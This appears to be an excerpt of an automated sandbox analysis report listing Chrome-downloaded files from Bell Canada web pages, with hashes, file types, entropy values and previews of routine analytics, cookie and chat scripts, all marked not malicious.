                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnk3JWNNQEQSRIFDVKKSaMSFwlF_9FmeR7JmhIFDVhccJISBQ1YnrzrEh4JzE7Os0r2zFASBQ1nZ7P-EgUN4ebU1hIFDVNaR8U=?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:CgkKBw1SikmjGgAKPQoNDVhccJIaBAhWGAIgAQosDVievOsaBAhLGAIqHwgKUhsKESFAJCMqLi1fPyYlKy89KSxeEAEY/////w8KIwoLDWdns/4aBAgjGAEKCw3h5tTWGgQIIhgBCgcNU1pHxRoA
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):411
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.330774188903462
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApB0WTbjpct/BeTrAApB0WTbjcLd+JyRE/NiZy7jZyOKU3F9e:zlPdct/BMlPVJJ/NNJKSFI
                                                                                                                                                                                                                                                                                                                                      MD5:C7BB7798214914B0A97B6994FD48EE0F
                                                                                                                                                                                                                                                                                                                                      SHA1:AA443B5FA4EAD2D13AEBC21B59ECB69118BAB0D3
                                                                                                                                                                                                                                                                                                                                      SHA-256:CED6F44AD8DF26B27D64189B9B6999CEC603B82539B9DDAD46CDD37EE56EF700
                                                                                                                                                                                                                                                                                                                                      SHA-512:FD2BB2B06BF3BE12F9DB905001B046F4B5FF5FA110BEB0B5F68051751D7D0EDEE162438F709699D023D5BEA1114E73765992C73F840331032234322E3FE94004
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20a-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20a-source.min.js', "_satellite.getVar(\"d_tracking_enabled\")&&s_oTrackPageLoad&&s_oTrackPageLoad({s_oTrackingSource:\"Page load\"});");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1099
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.312651609837477
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:/OsIXvuPQa8VyIaoK8d7mQMJHvIOtmRY/Itt7IkQv1Bsj6GimR4Eq:DKgJTS7m9Zm76fs9p4J
                                                                                                                                                                                                                                                                                                                                      MD5:AB480182E18A16841A9028D8857825BB
                                                                                                                                                                                                                                                                                                                                      SHA1:5CBBA3587416D96008F9B003AEEE310EE64C7303
                                                                                                                                                                                                                                                                                                                                      SHA-256:8F8DF557C921A7D531BD7A4C5600E1758717368EB05CE4224279141BC4FF0DE4
                                                                                                                                                                                                                                                                                                                                      SHA-512:72DF6D2D9F81D77297EDEE94C04703AD51202D721786F959B5B6515349B6DBEEC106F61ECDB4C2E2B5FAC88B2DABC56E1CFC7349EF08BE9F6ADA02C8C5B65250
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.(function(){if(!window.KAMPYLE_EMBED){window.KAMPYLE_EMBED={kampyleInit:function(){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=KAMPYLE_EMBED.getGenericLocation();t.charset='UTF-8';document.body.appendChild(t);},kampyleLoadLogger:function(){},kampyleEventHandler:function(elem,eventType,handler){if(elem.addEventListener){elem.addEventListener(eventType,handler,false);}.else if(elem.attachEvent){elem.attachEvent('on'+eventType,handler);}},isSupported:function(){var trident=window.KAMPYLE_EMBED.getUserAgent().match(/Trident\/(\d+)/);var msie=navigator.userAgent.match(/MSIE (\d+)/);return!(trident||msie);},getUserAgent:function(){return navigator.userAgent;},getGenericLocation:function(){var genericLocation=location.protocol+'//'+'resources.digital-cloud.medallia.ca/wdccan/36793/onsite/generic1730279018395.js';return genericLocation;},};if(window.KAMPYLE_EMBED.isSupported()){if(document.readyState==='complete'){window.KAMPYLE_EMBED.kampyleInit();}.els
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "LEAD Technologies Inc. V1.01", baseline, precision 8, 176x56, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):5710
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.744889276138522
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:kE18gUZLqjM7XVs/RrubOkUBQcdYG6s+G8S7XRGgV1u8RahNTooD1A:k5gUZGjM7X6AvcuG6s+Gx7Fq8Ahlo1
                                                                                                                                                                                                                                                                                                                                      MD5:1C0485983974299CCB4AED930D886D84
                                                                                                                                                                                                                                                                                                                                      SHA1:99EF139A0A1E50626C85CE274B544AC81BF54870
                                                                                                                                                                                                                                                                                                                                      SHA-256:3EA9125EA4CC2B1B778E4ABC6887B1E987714C114496A1BB52F6B4871710B6F2
                                                                                                                                                                                                                                                                                                                                      SHA-512:528306AD322D6E7BBFB141C8663CA378B60278F5A511E143116042AEDD972AEB02E9B8293095B4C18E893DF9DDDEA95AB3ADD703EE7F803D6E359C4CEEA5A550
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/RSX/shop/img/app-store-icon__apple_en.jpg?ver=202303211822
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.....`.`......LEAD Technologies Inc. V1.01....C....................................................................C.......................................................................8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........l.......c...ZL.2./H.59.m..|...F.........o....W."...Au...W.R.?.3@............_.(....Q.|.pn..."....._.Uy....)f...r{}}..o. g......f.....t...>..+.~xHI&i7.v....I..8. .2.......|D..$7Y.....}.p............*.k..O.......o..x[.e.....'....A1.+........3.pq..G.....y.r#.J..N....s..t......y................P.......j.......x..:]...".-..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREkP1yqXXl6ETPA1CSHI:UrXiH4qX1D8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:BB6D670297407A15374798F67C2C0E18
                                                                                                                                                                                                                                                                                                                                      SHA1:9C2C404ADE62463F2A696CBE581F5A1078D029F7
                                                                                                                                                                                                                                                                                                                                      SHA-256:F396212119043D217589119E4207300DA92F250F23CA8383993734D907C38569
                                                                                                                                                                                                                                                                                                                                      SHA-512:74AF7B905C5011B995CA54369E8D99A21BCA549DCA02EFBC5F6097E1C64C9ED4F7BE374ADE65FCF39D7F9BD033F9EC435C5FA67897C6A5C426C0391D67063B21
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__8 === 'function' && branch_callback__8("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15669), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.263742140717986
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:06T0S1t5pEIntlomlmixUxwoaCnh21A1xKrpEIntlomlSopTg:rrPa6oaCnhIA1xAMIg
                                                                                                                                                                                                                                                                                                                                      MD5:CB5B7E9FD96CB0442D68F85B47E87902
                                                                                                                                                                                                                                                                                                                                      SHA1:D9E94789F8C9B539CEF9011D3A82398DF60E833A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D9B2E5281ABB267C48866876D6037E8EDF343C52D185F147DBC8FA393C73C388
                                                                                                                                                                                                                                                                                                                                      SHA-512:329E8F71C12E3FF05358F2451CDE7523528CF53B98BCD2F5A4987F7B6C9E1038481359364E59E757CD8AC0E34D3AEA449C419671BC89B87ABA7058E2937F3147
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:function setechatCookie(e, t) { "https:" == window.location.protocol ? document.cookie = e + "=" + t + ";domain=.bell.ca;path=/;secure=true;samesite=Lax" : document.cookie = e + "=" + t + "; path=/; domain=.bell.ca;" } function getechatCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var o = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[o.trim()] = i }), t[e] } function dragElement(e, t) { if (null !== e) { var o = 0, i = 0, c = 0, s = 0; if (-1 != navigator.userAgent.indexOf("MSIE") || !0 == !!document.documentMode) var a = document.getElementById("mydiv").getBoundingClientRect().left; else var a = $(window).width() - e.offsetWidth; var l = $(window).height() - e.offsetHeight; function p(e) { (e = e || window.event).preventDefault(), c = e.clientX, s = e.clientY, document.onmouseup = r, document.onmousemove = n } function n(p) { if ((p = p || window.event).preventDefault(), o = c - p.clientX, i = s - p.clientY, c = p.clientX, s = p.cli
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33379), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33379
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1065918509650805
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:GKqZzz8X21jF2Vn8LJMurwD+l4hj+zIOGWsWEawZq2xyDHgLX/jg:eL3+n1EwDvrPWs+2qF
                                                                                                                                                                                                                                                                                                                                      MD5:41F4301D02B2889FB4D8A8067F350768
                                                                                                                                                                                                                                                                                                                                      SHA1:5CD52BAD684A3D554B40C2D56953EE69C473B3A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:F4AF2A9C01F60CAF9FEFCA07A215E65AAEBB13A3144FE6E21DC4B9B1C18480E7
                                                                                                                                                                                                                                                                                                                                      SHA-512:71CD9E96B39E5310946AE5D1456CAAAEE888910208BADEB2B078A4D9955C18110B46DEB05632CAC4ED9954DA612CB2B35D56E03775A5E66514E48074251F2729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var BELL = function (e) { return e.gConnector.utils = { cookieManager: { setLanguageRegionCookieValue: function (e, t, n, o) { var i = "gemini", a = 1 == o ? null : BELL.gConnector.utils.cookieManager.getCookie(i), c = BELL.gConnector.utils.cookieManager.getGeminiString(e, t, a, n), l = ".bell.ca"; window.location.hostname.toLowerCase().indexOf("virginmobile.ca") > -1 && (l = ".virginmobile.ca"), BELL.gConnector.utils.cookieManager.setCookie(i, c, 90, l) }, getGeminiString: function (e, t, n, o) { var i = "region=" + t + "|language=" + e + "|province=" + t + "|LarSegmentType=" + o; if (null != n) { var a = n.split("|"); null != t && 0 != t.length && (a[0] = "region=" + t, a[2] = "province=" + t), null != e && 0 != e.length && (a[1] = "language=" + e), null != o && null != o && 0 != o.length && (a[3] = "LarSegmentType=" + o), i = a[0] + "|" + a[1] + "|" + a[2] + "|" + a[3] } return i }, getCookie: function (e) { var t = ("; " + document.cookie).split("; " + e + "="); if (2 == t.length)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE3/yqXXl6ESQ1CSHI:UrXi8aqX16MRo
                                                                                                                                                                                                                                                                                                                                      MD5:0E7DB6917B4027E0CA2A243015EE306C
                                                                                                                                                                                                                                                                                                                                      SHA1:F92436FBCB5B0BB456422429CC79B75E94DBF508
                                                                                                                                                                                                                                                                                                                                      SHA-256:0BDCF6C0B6918AB166031C75874F9C3CEAA4FD1963CA62AF58A875D12545EDA0
                                                                                                                                                                                                                                                                                                                                      SHA-512:AB243B5DEE97B1AD6126BCE43AADC5055E875994B64A890BAED0F3F453ACE7EE01F5C4BC7D9D17B6C6C7EF16F2B4B7201766546991299CBCCE385DAA824DCD5E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__5 === 'function' && branch_callback__5("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                      MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                      SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                      SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                      SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://td.doubleclick.net/td/ga/rul?tid=G-MTKGWZ28E4&gacid=1209393833.1730380347&gtm=45je4as0v882555574za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1413467012
                                                                                                                                                                                                                                                                                                                                      Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUP1CSHI:UrXimPwqX1/tRo
                                                                                                                                                                                                                                                                                                                                      MD5:58F945C9D418F06F89DAC38E33C9CB3F
                                                                                                                                                                                                                                                                                                                                      SHA1:86FB4BD2D9DF351F2F973395210795C2BCBFA2DD
                                                                                                                                                                                                                                                                                                                                      SHA-256:951B8330552312B27356D86FD8EDA74E67700F16E9D8BD754D08A2484564A1B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:0B189A69DF18396A01D34D47CB8D7FB8D827C79C58664EAA11A56ACEA56813A45F074FB8FE133861959D71A378C71F1BB46B34D393251C6FA149B2DF6BD74CAD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):48466
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.302671982956141
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:Ae29CDKTQTuopWi6FFzUm9qyxJT9TmT9oTElQx42M7PJ66CyFiR+WJWXLjNIKgAB:Ae2IAopWioB9qyrx42M7PJ6dyFidWbjn
                                                                                                                                                                                                                                                                                                                                      MD5:C19F3E74E300172964BF9052AEE6EB08
                                                                                                                                                                                                                                                                                                                                      SHA1:3AE53757AAF2D40565AB95BFB7B968EC3DB2EAD3
                                                                                                                                                                                                                                                                                                                                      SHA-256:87C5F66E5288824DDA4C1806B6F3C8A6D1FA454AE3FFDA18EDD26E2C99687449
                                                                                                                                                                                                                                                                                                                                      SHA-512:FA486B822B0C1926757B623693521218B8D79DC7B753CABCF321C7F6BEBC645F762272FECA0EB1ADAD71C946134E45B2D80FF04746FC771FCD8C905369DF7B55
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/RSX/shop/img/LoginPageQRCode.jpg?ver=202303211822
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........(......(......(.......T.......l...o..rT...@....j....<-..e....M..~+P.@....P.@.........1......r.....R.>U........M.../..,.......(...........\...2....../h..................q...W@.U...?..>...k..L.....@....P.@....P.._..;.h.........(......(......(......(......(......(......(......(..S..c..5.....P...|........X......7j4...@....P.@....P......kg........J..W.....&'.7..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15669), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.263742140717986
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:06T0S1t5pEIntlomlmixUxwoaCnh21A1xKrpEIntlomlSopTg:rrPa6oaCnhIA1xAMIg
                                                                                                                                                                                                                                                                                                                                      MD5:CB5B7E9FD96CB0442D68F85B47E87902
                                                                                                                                                                                                                                                                                                                                      SHA1:D9E94789F8C9B539CEF9011D3A82398DF60E833A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D9B2E5281ABB267C48866876D6037E8EDF343C52D185F147DBC8FA393C73C388
                                                                                                                                                                                                                                                                                                                                      SHA-512:329E8F71C12E3FF05358F2451CDE7523528CF53B98BCD2F5A4987F7B6C9E1038481359364E59E757CD8AC0E34D3AEA449C419671BC89B87ABA7058E2937F3147
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/_web/custom/js/echat/echat-common.min.js
